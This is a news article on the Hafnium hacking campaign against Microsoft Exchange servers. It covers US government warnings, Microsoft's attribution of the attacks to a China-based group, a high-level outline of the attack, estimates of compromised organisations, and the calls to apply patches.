The White House described the threat as active and said everyone running the servers needed to act now to patch them.
The US Cybersecurity and Infrastructure Security Agency (CISA) released an emergency directive telling agencies and departments to take urgent action.
Tens of thousands of US organisations have been hacked.
At the weekend, the US National Security Council said it was "essential that any organisation with a vulnerable server take immediate measures" to determine if they had been targeted.
Microsoft executive Tom Burt revealed the breach in a blog post that described the hackers as “state-sponsored”.
Updates to counter security flaws have been implemented.
The Microsoft Threat Intelligence Centre (MSTIC) named the bad actors as Hafnium.
“Hafnium operates from China, and this is the first time we’re discussing its activity. It is a highly skilled and sophisticated actor,” Burt wrote.
Hafnium has been accused of trying to steal information from groups such as infectious-disease researchers, law firms, higher-education institutions, and defence contractors, targeting on-premises Exchange Server software.
Attacks
The attacks involve three steps. Firstly, access to an Exchange Server, either with stolen passwords or by using previously undiscovered vulnerabilities to disguise itself as someone who should have access.
Secondly, the hackers create what’s called a web shell to control the compromised server remotely.
Thirdly, they use that remote access – run from the US-based private servers – to steal data from an organisation’s network.
A spokesman for the Chinese government told Reuters that the country was not behind the hack.
'Unusually aggressive'
Beijing has repeatedly rejected US accusations of cyber-crime.
Over 20,000 organisations have been compromised in the US, with many more affected worldwide, Reuters reported.
Brian Krebs, an industry expert and blogger, put the number higher, citing multiple security sources.
"At least 30,000 organisations across the United States – including a significant number of small businesses, towns, cities and local governments – have over the past few days been hacked by an unusually aggressive Chinese cyber-espionage unit that's focused on stealing email from victim organisations,” he said.
Patches
Jake Sullivan, the White House National Security Adviser, urged network owners to download the security patches as soon as possible.
Microsoft told customers "the best protection" was "to apply updates as soon as possible across all impacted systems".
However, it also said it was deploying some mitigation techniques designed to help those who are unable to upgrade quickly, but warned they were not "a remediation if your Exchange Servers have already been compromised, nor are they full protection against attack".
This is the eighth time in the past 12 months that Microsoft has publicly accused nation-state groups of targeting institutions critical to civil society.